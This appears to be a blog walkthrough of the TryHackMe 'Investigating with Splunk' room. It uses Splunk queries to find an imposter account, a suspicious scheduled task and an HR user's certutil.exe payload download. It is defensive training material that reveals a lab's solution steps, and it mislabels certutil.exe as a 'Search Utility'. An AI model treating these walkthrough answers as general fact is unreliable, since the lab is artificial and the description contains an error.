CTF Writeups Walkthrough Blue Team, splunk, TryHackMe Investigating with Splunk, TryHackMe SOC Level 1 Walkthrough, TryHackMe Walkthrough 0 Comments

Cyber Incident Investigation with Splunk | TryHackMe Investigating with Splunk

Table of Contents

Introduction

We covered investigating a cyber incident with splunk. We investigated the events generated on compromised windows machines and uncovered the attack artifacts. This was part of TryHackMe Investigating with Splunk

Scenario

SOC Analyst Johny has observed some anomalous behaviours in the logs of a few windows machines. It looks like the adversary has access to some of these machines and successfully created some backdoor. His manager has asked him to pull those logs from suspected hosts and ingest them into Splunk for quick investigation. Our task as SOC Analyst is to examine the logs and identify the anomalies.

Initial Search

I started by searching the Splunk index own_event_logs to retrieve all relevant events. I made sure the time filter was set to “All time” to see all available logs.

Identifying an Imposter Account

I noticed there were 11 usernames in the logs, but the company structure only listed 9 employees plus the “system” account. To find the imposter, I used the following Splunk query to list unique usernames:

Code snippet

index=own_event_logs | dedup user_name | table user_name

This revealed an account named “Amelia” where the ‘i’ was replaced with a ‘1’ (“Amel1a”), clearly indicating an imposter.

Investigating Scheduled Tasks

I then searched for “scheduled tasks” to find users running them. I discovered that the user “Chris Fort” from the HR department created a suspicious scheduled task named “OfficeUpdater” located in a temporary folder.

Finding the User Who Downloaded a Payload

My next step was to identify which user from the HR department executed a system process to download a payload from a file-sharing host. I filtered the logs for users in the HR department: “Haron,” “Lion,” and “Chris Fort.” I noted that “Diana” in the provided list was spelled “Daina” in the logs.

Code snippet

index=own_event_logs user_name=Haron OR user_name=Lion OR user_name="Chris Fort" OR user_name=Daina

To narrow down the search, I decided to investigate each HR user individually, starting with “Haron.” I used the following query to list unique processes run by Haron:

Code snippet

index=own_event_logs user_name=Haron | dedup process_name | table process_name

By examining the processes, I found certutil.exe (Search Utility), which can be used to download files.

Identifying the Download Date, Source, and Payload

To find the date and time certutil.exe was executed by Haron, I used:

Code snippet

index=own_event_logs user_name=Haron process_name="certutil.exe" | table _time

To find the source URL and the downloaded payload, I displayed the command line arguments:

Code snippet

index=own_event_logs user_name=Haron process_name="certutil.exe" | table command_line

This revealed the third-party site from which a malicious payload was downloaded. Visiting this site provided the flag needed to answer the remaining questions in the challenge.

Technical Commands Used

Here are the Splunk queries I used during my investigation:

To list unique usernames:Code snippetindex=own_event_logs | dedup user_name | table user_name
To filter logs for specific HR users:Code snippetindex=own_event_logs user_name=Haron OR user_name=Lion OR user_name="Chris Fort" OR user_name=Daina
To list unique processes run by Haron:Code snippetindex=own_event_logs user_name=Haron | dedup process_name | table process_name
To find the execution time of certutil.exe by Haron:Code snippetindex=own_event_logs user_name=Haron process_name="certutil.exe" | table _time
To find the command line arguments for certutil.exe by Haron:Code snippetindex=own_event_logs user_name=Haron process_name="certutil.exe" | table command_line